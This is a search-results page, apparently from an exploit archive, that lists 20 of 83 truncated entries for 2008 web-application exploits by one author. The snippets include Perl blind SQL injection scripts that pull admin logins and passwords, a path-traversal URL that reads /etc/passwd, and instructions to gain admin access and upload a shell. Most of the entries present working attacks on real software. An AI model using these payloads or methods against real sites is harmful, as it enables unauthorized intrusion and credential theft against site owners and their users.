83 matches found
MyPicGallery 1.0 - Arbitrary Add Admin
!/usr/bin/perl use strict; use LWP::UserAgent; print "-+-- MyPicGallery 1.0 Arbitrary Add-Admin Exploit --+-\n"; print "-+-- Discovered && Coded By: t0pP8uZz --+-\n"; print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+-\n"; print "-+-- MyPicGallery 1.0 Arbitrary Add-Admin Exploit...
GNU/Gallery 1.1.1.0 - 'admin.php' Local File Inclusion
--==+================================================================================+==-- --==+ GNU/Gallery Vulnerability: http://site.com/admin.php?show=../../../../../../../etc/passwd NOTE/TIP: fair amount of sites running, althou no good dork. GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !...
GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability
Exploit for unknown platform in category web applications ===================================================================== GNU/Gallery Vulnerability: http://site.com/admin.php?show=../../../../../../../etc/passwd NOTE/TIP: fair amount of sites running, althou no good dork. 0day.today 2018-04...
RantX 1.0 Insecure Admin Authentication Vulnerability
Exploit for unknown platform in category web applications ===================================================== RantX 1.0 Insecure Admin Authentication Vulnerability =====================================================...
ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access
Exploit for unknown platform in category web applications =============================================================== ActiveKB = 1.5 Insecure Cookie Handling/Arbitrary Admin Access ===============================================================...
Feedback and Rating Script 1.0 - detail.php SQL Injection
Feedback and Rating Script 1.0 - detail.php SQL Injection --==+================================================================================+==-- --==+ Feedback and Rating Script 1.0 detail.php Remote SQL Injection Vulnerability +==--...
ajauction-sql.txt
--==+================================================================================+==-- --==+ AJ Auction = 6.2.1 classifidead.php Remote SQL Injection Vulnerability +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discover...
AJ Classifieds 2008 - index.php SQL Injection
AJ Classifieds 2008 - index.php SQL Injection --==+================================================================================+==-- --==+ AJ Classifieds 2008 index.php Remote SQL Injection Vulnerability +==--...
AJ Article 1.0 - 'featured_article.php' SQL Injection
--==+================================================================================+==-- --==+ AJ Article 1.0 featuredarticle.php Remote SQL Injection Vulnerability +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovere...
Web Calendar <= 4.1 Blind SQL Injection Exploit
Exploit for unknown platform in category web applications =============================================== Web Calendar ; print "\n\nInjecting Please Wait..\n\n" my $lop = 1; my $num = 48; my $sub = 1; my $res = undef; my $content = undef; while$lop $content = get$url."/oneday.php?userid=1 AND...
Web Calendar 4.1 - Blind SQL Injection
Web Calendar 4.1 - Blind SQL Injection !/usr/bin/perl use strict; use LWP::Simple; print "-+-- Web Calendar ; print "\n\nInjecting Please Wait..\n\n" my $lop = 1; my $num = 48; my $sub = 1; my $res = undef; my $content = undef; while$lop $content = get$url."/oneday.php?userid=1 AND...
Web Calendar 4.1 - Blind SQL Injection
!/usr/bin/perl use strict; use LWP::Simple; print "-+-- Web Calendar ; print "\n\nInjecting Please Wait..\n\n" my $lop = 1; my $num = 48; my $sub = 1; my $res = undef; my $content = undef; while$lop $content = get$url."/oneday.php?userid=1 AND ASCIISUBSTRINGSELECT CONCATlogin,char58,password,char...
OpenInvoice 0.9 - Arbitrary Change User Password
OpenInvoice 0.9 - Arbitrary Change User Password !/usr/bin/perl OpenInvoice 0.9 Arbitrary Change User Password Exploit Discovered && Coded By t0pP8uZz Discovered On: 18 April 2008 Vendor has not been notified! see exploit for more details.. Greetz: milw0rm.com, h4ck-y0u.org, CipherCrew! use stric...
picturerating-blindsql.txt
!/usr/bin/perl -- Picture Rating 1.0 Blind SQL Injection Exploit -- -Info/Instructions- After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ ok once you have logged in has admin you can upload a shell, click...
Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability
No description provided by source. --==+================================================================================+==-- --==+ Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability +==-- --==+================================================================================+==--...
pigmysql-sql.txt
!/usr/bin/perl - PIGMy-SQL ; print "Valid Photo ID: "; chompmy $pid=; ifinjecttest$url, $pid print "\nInjecting Please Wait.. This could take several minutes.\n"; my $result = blindattack$url, $pid; print "Exploited! Admin Details Are: ".$result; exit; sub blindattack my $url = shift; my $pid =...
iScripts Socialware - 'id' SQL Injection
--==+================================================================================+==-- --==+ iScripts SocialWare SQL Injection Vulnerbility +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: 8 April 2008 SITE...
Picture Rating 1.0 Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl -- Picture Rating 1.0 Blind SQL Injection Exploit -- -Info/Instructions- After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ ok once you have logged in has...
Prozilla Cheat Script 2.0 (id) Remote SQL Injection Vulnerability
No description provided by source. --==+================================================================================+==-- --==+ Prozilla Cheat Script 2.0 SQL Injection Vulnerabilitys +==-- --==+================================================================================+==-- Discovered By...
Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability
Exploit for unknown platform in category web applications =============================================================== Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability ===============================================================...